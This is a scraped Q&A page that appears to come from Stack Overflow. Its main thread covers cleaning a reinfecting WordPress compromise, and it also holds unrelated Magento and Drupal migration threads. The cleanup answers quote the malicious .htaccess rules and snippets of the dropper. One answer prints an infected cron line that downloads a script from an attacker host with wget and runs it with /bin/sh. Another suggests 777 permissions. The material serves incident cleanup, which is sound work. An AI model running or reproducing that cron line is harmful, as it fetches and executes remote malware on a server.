We Keep Coding

Suspicious files in Cpanel [duplicate]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 10 months ago.
Improve this question
I have a wordpress site that features a .htaccess and a file called postfs.php.
But when I try to delete them, they are written again.
I tried to delete all the files on the site, change permissions, check the cron ... but nothing to do. These files appear as soon as I delete or edit them.
The contents of the file are as follows:
.htaccess:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.$
Order allow,deny
Allow from all
</FilesMatch>
AddType application/x-httpd-cgi .sh
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
And the postfs.php have that content: PHP Decode
How can avoid the restoring of this files?
Has anyone had similar experiences?

I had the same problem and the antivirus was not able to detect it and also the problem of automatically creating files was not related to CronJobs, as friends mentioned.
In fact, every time a page is opened from the site, those files are rebuilt.
I have carefully examined the issue and offer the solution.
The problem occurs for both .htaccess and index.php.
First we search for a keyword in the text of the file:
# grep -lir "wjsindex.php" ./
./wp-admin/images/arrow-rights.png
./wp-includes/images/smilies/icon_crystal.gif
./.htaccess
For another file, we search for a keyword in the text:
# grep -lir "RZXiMOEbYmVH" ./
./wp-admin/images/arrow-lefts.png
./index.php
./wp-includes/images/smilies/icon_devil.gif
If you look at the contents of these found image files, you will see that they are not images and contain malicious code that exactly matched our two original files.
Sample:
We now search for all four files found:
# grep -lirE "arrow-rights.png|icon_crystal.gif|arrow-lefts.png|icon_devil.gif" ./
./wp-includes/load.php
./wp-includes/template-loader.php
If you edit these two results files.
At the bottom of the file load.php and at the beginning of the file template-loader.php you will see the extra code that needs to be removed. (Starting with //ckIIbg)
To find out more exactly which sections are correct and which are malicious, just replace that file from another WordPress that you are sure is safe and the same version, or find and remove the extra sections with the diff command.
Thus:
# diff ./wp-includes/load.php ~healthy/www/wp-includes/load.php
# diff ./wp-includes/template-loader.php ~healthy/www/wp-includes/template-loader.php
And as a final step, delete the four malicious image files:
# rm -f ./wp-admin/images/arrow-rights.png ./wp-includes/images/smilies/icon_crystal.gif ./wp-admin/images/arrow-lefts.png ./wp-includes/images/smilies/icon_devil.gif
Edited:
And also check cronjobs (/var/spool/cron/username) for be like this infected line and remove it:
* * * * * wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home//username/public_html 24 && rm -f xxxd
This code create a ./css/index.php file and can be deleted.

We had the same exact hack a while ago
The first step is to decode the index.php file, and after decoding we see that there are 4 infected image files
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
First delete the infected 4 images, and check your cron and delete any cron job you didn't create.
Run this ssh to delete all .htaccess files within all sub directories
find . -type f -perm 0444 -name ".htaccess" -exec echo rm {} \;
Use the default wordpress .htaccess, and index.php files.
After finishing, you can install wordfence, and activate the firewall, also don't forget to update your wordpress core, plugins, and themes.

If files start reappearing after you deleted them you should look out for lines of code - often in the index.php file - where a time-limit or a TTL (Time To Live) is specified, along with a (most of the time) very long line of base64 code. (These are often recognizable by a couple of shorter lines of code with 'equal-to' signs in the middle.)
The way this works is the time-limit / TTL makes sure all files are held up against a reference set of files located either on another url or in the webservers cache, and if one is missing it will sync itself back.
One thing you can do to solve this is deleting the script together with restarting apache and php / nginx. This cleans out the webservers cache.
After that you can clean out the malicious deny allow rules and stuff that's in the .htaccess files and probably other stuff that's lurking between the files and folders of your webapplication.
Bonus suggestions to really try and solve the actual security issue here:
Always make sure ALL software / plugins / modules / themes / etc. is up to date. Don't miss out on any security patches!
Make sure to change every password on every account providing access to your webapplication. (don't forget the FTP accounts and backend panels and stuff).
Try to run a malware scan (if you have a shared hosting package you might do so through a security plugin, or ask your hosting company to run one)
Make sure there aren't any users, plugins, or any other possibly malicious components you've never heard of and haven't installed!
At least make sure to check the root folder, all upload folders, and the temporary folders for malicious files.
I hope this helps out others with similar issues!

in the first step, you should find shell file
(your host provider can does it with antisheller )
1.remove unused theme and plugin in the WordPress
2.login in SSH area and run this command
`find /home/.../wordpres_directory -type f -name ".htaccess" -delete
3.open the updated page with this link
youdomain/tld/wp-admin/update-core.php?action=do-core-reinstall
if you still see the problem you should do step 2 and 3
your server need security config, call to host provider to secure the server

i solved problem
create new FTP account and editing htacceess and index.php whit Filezila . then you should deletin wp-admin and uploading new file and folder by new version wordpress. also wp-include . and then you can

You must search for every .htaccess file and use an FTP client and deleted it. (almost 5000 in my case) Upgrade plugins to solve security breaks.

Dunno if this is still active, but if someone comes across this. This was how I solved this:
First isolate the website to my IP so I could work alone.
Removed WP installed keept wp-content.
Updated WP manual trough FTP.
Repair / recreate DB.
Deactivate all plugins.
Disable themes simplest way is just to tmp change the name on the themes folder to _theme istead of themes.
Update all plugins.
Checked active theme folder for changed date. Found a folder in my inc folder that had a index.php and forge.php. Removed those.
Lastly checked root folder again. Found a folder called CSS removed that aswell since that also had php files that did not belong.
Removed htaccess files according to above.
Recreated htaccess file.
Activated all plugins and themes.
Checked once more for file changes is I had missed anything.
Allow traffic to site once more and keep an eye on access.log for wierd requests.
Maybe don't help everyone but this worked fine for me and no traces are left.
GLHF!

Ultimately.. none of them work. Follow this option and keep monitoring the .htaccess and index.php file in the respective domain folder where you see this issue.
Dont uninstall / drop the wordpress installation. All the records stored will be gone.
Take a backup of the DB file from MySQL, by looking for the DB mapped to the domain
Now create a new sub-domain
Install wordpress mapped to the sub-domain
import the db to the newly created DB [against the new WP instance]
create the respective views... you will have to open the sql file and change the user / dbname against the views created and manually restore them
once all the above done, now open the table wpxx_options and update the 2 records with the new sub-domain name
8.Now go to WP and add the theme which you had installed earlier [dont use a new one]
Install only the required plugins and not all as you did earlier installation
go to wp_content folder [from earlier installation] and get all the media files and copy them to the wp_content folder [1999,2000,20xx...] folders is what I meant and not all
finally go to your wp-config.php and change the table prefix to the new one
//$table_prefix = 'wpxx_'; //old one
$table_prefix = 'wp1234_'; // new one
with this I think it should work.
Had tried by removing the files and uninstalling all, including domain and restored.. the same junk info gets updated in the two files [.htaccess and index.php].. so had to follow the above steps.. its working for now.. have to keep monitoring the above files. Hope it works for you too..if you have additional findings.. do update here

You might have a cronjob that keeps on adding the .htaccess files, lookuout for a cronjob with a wget request to hello.turnedpro.xyz.
If you are using cpanel you can reset your cpanel account password and run antimalware scan for any keyloggers/malware .e.g redline stealer.

I had the very same problem, In my case, I had several wp sites under one user, very convenient for me to maintain the sites, but made the clean up more tricky, sort of whack a mole situation.
Both malicious .htaccess and index.php were regenerating as soon as they were deleted. What I did was look for all the radio.php and about.php with malicious code (easy to find because they are bigger in size and out of place) and also found some folders called "maint" with files with malicious code. After cleaning this, the .htaccess and index.php infected did not regenerate anymore, so after copying the fresh wp files, everything was fine, and was able to access wp-admin correctly.
in one particular wp folder, even deleting all the files, infected .htaccess and index.php files were still regenerating, so what I did was to delete the root folder containing the WP install and create a new one with a different name, and after pointing the domain name to the new folder, voila! all fine!

Today I found a WordPress 5.7.5 Infected, all Htaccess files had permissions for malicious files in the whole menu panel, and then backed up everything, I found several files with strange names that were infected in the root and other locations, I removed, I changed all the passwords, I downloaded the official installation WordPress 5.7.5, I deleted the WP-admin folder and I sent from the official installation in this Paniel normalized and I could update all the plugins, so I did the same with WP-includes, already the WP-content I requested the hosting that runs the find command to delete all htaccess so I did upgrade to a new version.

Magento DEV. clone are redirectingg to the main URL [duplicate]

We have moved out magento site to another host. But it is redirecting to the old site
We did following changes before moving the site
1. DB backup
2. files are zipped and copied to another host.
after moving the site to another host
1. changed the /web/secure and /web/unsecure values in the DB.
2. In magento files /app/etc/local.xml changed the database name.
3. cleared the var/cache
4. cleared the var/tmp
5. cleared the var/session.
but still the magento site is redirected to old site.
Can any one help me with this.
Thanks

Several steps involved in cloning or moving a website.
NOTE: It's common practice to empty the var/cache, var/session directories before copying to new location. Clearing cache is mentioned below as it's necessary to clear the cached config after you've run through the list and properly set database access, BaseURL, etc.
Copy application files to new location and import database into MySQL. (best to do this with a tarball and database dump sql file, ftp has issues with things like getting .htaccess files to transfer, case to matter, etc.) Note: more sophisticated Magento admins use rsync, it's far easier.
(important!!) Make sure file/folder permissions and owner/group are correct so that var/ folder system is writable. Otherwise the Magento cache gets written in system /tmp instead of Magento var/ and only a server reboot or manual deletion will clear Magento cache out of /tmp . Also, not having var/ writable means that any drastic errors that write a file to var/report/ will fail to write any stack traces, compounding your installation heartburn.
Make sure app/etc/local.xml points to the proper database and make sure if you back up the original local.xml that it doesn't end in .xml -> needs to be something like local.xml.sv1
Change your database entries Unsecure BaseUrl for and Secure BaseURL to point to your new location (http://www.example.com and if ssl cert installed https://www.example.com respectively). Use phpmyadmin to look for the paths web/unsecure/base_url and web/secure/base_url in the core_config_data table. (Note: entries will exist for each scope set, minimum is Global)
Manually clear your cache by deleting all the mage--? subfolders in var/cache
If you were using the compiler on the previous site, disable compiler with SSH command line php shell/compiler.php disable from the Magento root.
Attempt to load your admin backend, you should be on the new server URL now.
Following these steps should clear all the hiccups that cause Magento to adamantly redirect back to the old server. And believe me, I've had them all happen.

Magento - CSS is not loading in magento

I have installed Magento on live server. But the problem is that its not loading css. I have double checked .htaccess file but There is nothing any issue in it. I have given full access permission on Var, Media & app/etc folder.
Please let me know that what is the issue ?
Thanks in advance.
Alex S.

In my case it is due to .htaccess file. In my project there is an .htaccess file in /skin folder with following content:
Header set Access-Control-Allow-Origin "*"
I have removed this file and it works fine.

View the source of your page and click the css links, if it is pointed correctly it should bring you to the css page.

For htaccess, make sure the RewriteBase / is uncommented. So from #RewriteBase / to RewriteBase /. Check the error log if possible. And, another thing i remember, you may need to clear your cache and tmp folder too. Do this first, clear cache and tmp folder.

At the time of installation magento asked about secure URL and unsecure URL. These urls must be changed when we change our server. If you couldn't access admin >> system >> configuration
Then you could change it from database. Find in table
dbprefix . core_config_data
change path
web/unsecure/base_url to your new domain name
web/secure/base_url to your new domain name
Note : Please don't forget to put forward trailing slash at last. like: www.newdomain.com/
Thanks.

When you changed base_url path in Mysql
as : web/secure/base_url = http://example.com/
Must mention / at the end of .com
Then clear session and cache.
Then restart MySQL and Apache2.
Similar for unsecure/base_url.

I will suggest follow step by step.
There is 2 case:
1) You can see your CCS directly from URL, so browser load it by direct URL, example: http://your-magento/skin/frontend/your-package/your-theme/css/styles.css, so in this case you should check points connected with Magento:
Check/Correct Base URL from config or DB
Clear Cache
Clear Sessions
Check Configurations
2) If your CSS is not loading by direct URL. So in this case it is not connected with Magento at all.
In this case you should check follwoing points:
Check files and folders permissions
Check rewrite rules and modules
Server Log files to find error
Check .htaccess for existance and for correctness.
Important, check all .htaccess files in all sub-folders.
In my case, I differed this 2 cases and start seaching my issue in second case.
I found .htaccess in folder /skin/frontend/your-package/your-theme/
The content was following:
Order deny,allow
Deny from all
Remove this file and your CSS files will be loaded.
I don't know how this file was created, I don't have file like this in parent theme. I think Magento is automatically created it. Be attentive and follow changes with GIT.

Check permissions for the folders like app/etc, var, media folders. Try to give 777 permissions to those folders. Recently I have faced the same problem and I tried with this. Then my site works fine.

Drupal move from subdirectory

I had a drupal site completely working at www.example.com/example. I copied the files to the root folder in attempt to simply have the site held at www.example.com yet now it is asking for a new install and I have no idea why, I expected to have to make some changes, but not to be confronted with the request of a new install. I have heard it may be something to do with changing the base url but I'm not sure. Can someone please help me?
Thanks heaps

Assuming your site is on a linux based hosting, most probably your problem is divided into two parts
Problem 1) The settings file "sites/default/settings.php" is read only so when you moved the site to another directory it most probably didn't move this file because it is read only, and that was pointed out by another person
Problem 2) The second problem may be the result of enabling clean urls and not moving .htaccess file; when you moved the site to another directory you may have left out the ".htaccess". Check to see if it is moved to the new directory.
Another possibility is that you have a modified .htaccess to make the subdirectory work, in that case you may want to get a fresh ".htaccess" file from here :
http://code.google.com/p/drupalgooglecode/source/browse/trunk/.htaccess

Redirect Loop on Drupal 6 after moving website

I posted a question earlier today asking which files needed to be changed to move drupal to MAMP successfully.
I've now moved it all over and connected it to the database, however, I'm stuck in a redirect loop whilst trying to view the website. As far as I can gather, the redirect loop is stuck between index.php and install.php
How do I fix this? What would cause a redirect loop?
I read somewhere that there was a redirect file in a tmp directory and removing it will solve the issue, but for me the file doesn't exist.

Check if your web server has read permissions for settings.php.
Also check if the database is set up properly. As always, drush is your friend.

Sounds like an .htaccess issue, this happens sometimes when you're moving the site from a root path (ie. example.com/) to a subfolder (ie. localhost:8888/drupal/).
Try changing the RewriteBase in the .htaccess file to:
RewriteBase /drupal/
Where drupal is the name of the subfolder Drupal is installed in.

Due to my own in-experience with Drupal, I failed to recognise that the site in question was a Drupal Multi-site. The sites folder contained 'all' and 'example.com' There was no 'default' folder.
There was two solutions to my issue.
Set up MAMP as a Virtual Host (so example.com would direct to my mamp installation and so tick all the boxes for the files redirection)
Change the folder name to 'localhost' and not 'example.com'
The second solution did leave me with one or two issues, but as I'm only needing this installation for the theme I decided a botched solution would be least time consuming.